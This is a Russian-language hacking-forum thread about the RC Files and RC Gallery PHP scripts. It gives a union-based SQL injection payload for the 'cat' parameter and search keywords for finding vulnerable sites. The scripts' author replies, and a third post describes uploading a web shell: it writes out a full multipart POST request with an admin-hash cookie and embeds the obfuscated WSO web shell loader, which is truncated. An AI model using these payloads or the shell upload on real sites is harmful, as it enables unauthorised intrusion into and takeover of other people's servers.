Нашел банальную уязвимость в скрипте RC Files v1.0 от RedCat'a, но оказалось, что дырка эта присутствует и в другой его наработке, RC Gallery, причем кочует из версии к версии. ------------------------------------- RC Files v1.0 | Powered by RedCat | ©2004-2008 ------------------------------------- Уязвимость присутствует из-за отсутствия фильтрации в параметре cat, что позволяет сформировать свой целевой запрос. cat=-1+union+select+1,2,3,4,5,6,7,8,9,0/* гуглим, видим: ... Уязвима также и версия 1.1, уязвимость аналогичная Более распространенный скрипт RC Gallery имеет аналогичную ошибку: ------------------------------------- RC Gallery v(<=)2.3 | Powered by RedCat | ©2004-2008 ------------------------------------- Уязвимость присутствует в параметре cat. Позволяет нам составить целевой запрос. имеем ... в версии 2.4 узвимость устранена. keywords : RC Gallery v2.3 (2.1,1,1..), RC Files v1.1, Powered by RedCat
При помощи гугла наткнулся на данную статью. Очень приятно , что на мои скрипты ктото обратил внимание))) Хоть и в таком ракурсе, но всёравно приятно! Спасибо. Скрипт галереи , это мой первый большой скрипт. Ни о каких "мерах безопасности" речь там не шла, была идея создать скрипт. До версии 2.4 они почти не отличаются друг от друга. Версия 2.4 переписана почти с нуля, но используется несколько кусков старого кода. До версии 2.5 руки не дошли, нужно было зарабатывать деньги и я стал заниматься "коммерческими" скриптами. Галереи 2.5 не будет, да и вообще наверное никаких больше скриптов не будет, не позволяет занятость на другом фронте. В обще при создании этой галереи я получил огромный опыт, хотя после были и другие более серьёзные скрипты. Если чтото интересно, спрашивайте... А пока, всем пока
наткнулся на эти скрипты а их до меня уже копали.. нашёл тоже самое.. такой облом. ==================== заливка шелла 1. пароль расшифровался. идём в админку adm_gallery.php редактируем Допустимые расширения и вписываем php через запятушку. заливаем шелл в месте загрузки картинок. 2. пароль не расшифровался. посмотрев, исходники формируем сразу POST-запрос для заливки. По умолчанию php не фильтруется(!!!) в куках ставим gal_admin_get_pass=<хеш пароля> POST-запрос (весь код шелла wso не вместился) Code: POST /gal_admin.php HTTP/1.1 Host: site.ru Keep-Alive: 30 Proxy-Connection: keep-alive Cookie: gal_admin_get_pass=b01502fd0c860bdd35c5c9289de412db Content-Type: multipart/form-data; boundary=---------------------------11538186919912 Content-Length: 23969 -----------------------------11538186919912 Content-Disposition: form-data; name="upload_cat" 1 -----------------------------11538186919912 Content-Disposition: form-data; name="upload_name" 123 -----------------------------11538186919912 Content-Disposition: form-data; name="upload_text" 234 -----------------------------11538186919912 Content-Disposition: form-data; name="upload_big_file"; filename="wso2.4.php" Content-Type: application/force-download <?php $auth_pass = "пыщь"; $color = "#df5"; $default_action = "FilesMan"; $default_charset = "Windows-1251"; preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31W .... ...тут код шелла))) .... LkkJJYtIOBpIc4bmVCjHJNUt6eCg3BAGeLq9x9Gt4uJYexm3ORT3UDtmLVhx5X4qm/OcBsLu8rUirk72Onl5tBjNRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='\x29\x29\x29\x3B",".");?> -----------------------------11538186919912 Content-Disposition: form-data; name="com" upload -----------------------------11538186919912 Content-Disposition: form-data; name="gal_menu" add -----------------------------11538186919912--